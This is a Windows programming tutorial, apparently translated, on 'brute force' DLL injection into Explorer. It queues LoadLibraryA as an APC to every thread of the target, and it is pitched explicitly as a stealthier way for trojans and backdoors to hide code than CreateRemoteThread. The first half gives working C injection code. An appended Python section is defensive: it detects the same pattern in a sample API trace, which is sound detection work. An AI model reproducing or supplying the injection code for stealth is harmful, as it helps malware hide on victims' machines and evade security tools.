Brute force injection Explorer

Jfpan20000@sina.com (pjf)
The most natural way to inject your own code into a running process is CreateRemoteThread. These days, however, remote thread injection is used everywhere, and just as many tools watch for remote thread creation and block it. A trojan or backdoor that injects into Explorer or IE this way on startup might as well write "I am a thief" on its face.
To hide user-mode code in another process less conspicuously, you should avoid creating a thread of your own in the target process at all. The following describes a simple but brute-force method; the example loads your own DLL into Explorer.
First, an API: QueueUserAPC.

DWORD QueueUserAPC(
    PAPCFUNC  pfnAPC,    // APC function
    HANDLE    hThread,   // handle to thread
    ULONG_PTR dwData     // APC function parameter
);

Everyone should be familiar with this API. It calls straight into the system service NtQueueApcThread, which uses KeInsertQueueApc to insert an APC object into the APC queue of the given target thread. If KiDeliverApc then builds the APC environment successfully, our code runs. Unfortunately it is not that smooth: whether UserApcPending in the thread's ApcState is TRUE has a decisive effect. If it is not set, you can wait forever and your code will still never execute. In kernel mode this is rarely a problem, since you can assign the value yourself, but a user-mode program cannot do that easily. What to do? The simplest answer is to let the system set it for us. The system sets UserApcPending to TRUE inside KeDelayExecutionThread / KeWaitForMultipleObjects / KeWaitForSingleObject when the wait is alertable (TestForAlertPending and KeTestAlertThread are also possible paths). The simplest case is therefore to queue the APC after the target thread has called SleepEx(..., TRUE).
Fortunately, in the Explorer process there is always some thread that suits us, so the simplest (though not the best) approach is to enumerate all threads in Explorer and queue the APC to every one of them:

......
SIZE_T ret;                       /* bytes actually written by WriteProcessMemory */
char *dllName = "C:\\mydll.dll";  /* path of the DLL to load in the target */
int len = strlen(dllName) + 1;    /* include the terminating NUL */

/* Reserve a buffer for the DLL path inside the target process. */
PVOID param = VirtualAllocEx(hProcess, NULL, len,
                             MEM_COMMIT | MEM_TOP_DOWN,
                             PAGE_READWRITE);
if (param != NULL)
{
    /* Copy the path into the target; LoadLibraryA will read it from there. */
    if (WriteProcessMemory(hProcess, param,
                           (LPVOID)dllName, len, &ret))
    {
        /* threadId[] holds the previously enumerated thread ids of the target. */
        for (DWORD p = 0; p < numberOfThreads; p++)
        {
            hThread = OpenThread(THREAD_ALL_ACCESS, 0, threadId[p]);
            if (hThread != 0)
            {
                InjectDll(hProcess, hThread, (ULONG_PTR)param);
                CloseHandle(hThread);
            }
        }
    }
}
......

InjectDll:
void InjectDll(HANDLE hProcess, HANDLE hThread, ULONG_PTR param)
{
    /* Queue LoadLibraryA as the APC routine; param points at the DLL path
       already written into the target process. kernel32.dll is mapped at the
       same address in every process, so the local address is valid there. */
    QueueUserAPC(
        (PAPCFUNC)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"),
        hThread,
        param);
}
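The "one APC per thread" loop above is also what makes this method easy to spot from the other side. The following script is an added example, not code from the original article: it reads a constructed API-call trace (the line format is invented for this example; the same fields come from an EDR, an ETW provider or a user-mode hooking DLL in practice) and flags a caller that allocates and writes memory in another process and then queues user APCs to many of that process's threads. APCs a process queues to its own threads are ignored, since that is ordinary behaviour.

```python
"""Added example (not from the original article): detect the 'APC to every
thread' injection pattern described above from a defender's side.

Input is a constructed API-call trace; the line format is invented for this
example. The logic transfers to any source that records caller pid, API name,
target pid and target thread id.
"""
from collections import defaultdict

# Constructed sample trace: "<caller pid> <api> <target pid> [<target tid>]".
# pid 4120 performs the brute-force APC injection into pid 1532 (Explorer);
# pid 2200 queues APCs only to its own thread, which is routine.
SAMPLE_TRACE = """\
4120 VirtualAllocEx 1532
4120 WriteProcessMemory 1532
4120 OpenThread 1532 1540
4120 QueueUserAPC 1532 1540
4120 OpenThread 1532 1544
4120 QueueUserAPC 1532 1544
4120 OpenThread 1532 1560
4120 QueueUserAPC 1532 1560
4120 OpenThread 1532 1576
4120 QueueUserAPC 1532 1576
2200 QueueUserAPC 2200 2204
2200 QueueUserAPC 2200 2204
"""


def parse_trace(text):
    """Parse trace lines into (caller_pid, api, target_pid, target_tid) tuples."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue  # skip blank or malformed lines
        caller, api, target = int(parts[0]), parts[1], int(parts[2])
        tid = int(parts[3]) if len(parts) > 3 else None
        events.append((caller, api, target, tid))
    return events


def find_apc_sprays(events, min_threads=3):
    """Return [(caller_pid, target_pid, distinct_threads, wrote_memory), ...].

    A hit is a caller that queued user APCs to at least `min_threads`
    distinct threads of *another* process. `wrote_memory` records whether
    the same caller also allocated or wrote memory in that target, which a
    LoadLibraryA-based payload needs (the DLL path must live in the target's
    address space).
    """
    apc_threads = defaultdict(set)
    wrote_memory = set()
    for caller, api, target, tid in events:
        if caller == target:
            continue  # APCs to a process's own threads are routine
        pair = (caller, target)
        if api in ("VirtualAllocEx", "WriteProcessMemory"):
            wrote_memory.add(pair)
        elif api == "QueueUserAPC" and tid is not None:
            apc_threads[pair].add(tid)
    hits = []
    for pair, tids in apc_threads.items():
        if len(tids) >= min_threads:
            hits.append((pair[0], pair[1], len(tids), pair in wrote_memory))
    return sorted(hits)


if __name__ == "__main__":
    for caller, target, n, wrote in find_apc_sprays(parse_trace(SAMPLE_TRACE)):
        print(f"pid {caller} queued APCs to {n} threads of pid {target}"
              f" (prior cross-process memory write: {wrote})")
```

The threshold on distinct target threads is what separates this pattern from a legitimate single cross-process APC; the prior VirtualAllocEx/WriteProcessMemory to the same target is the second signal, since the article's payload only works if the DLL path has been placed in the target beforehand.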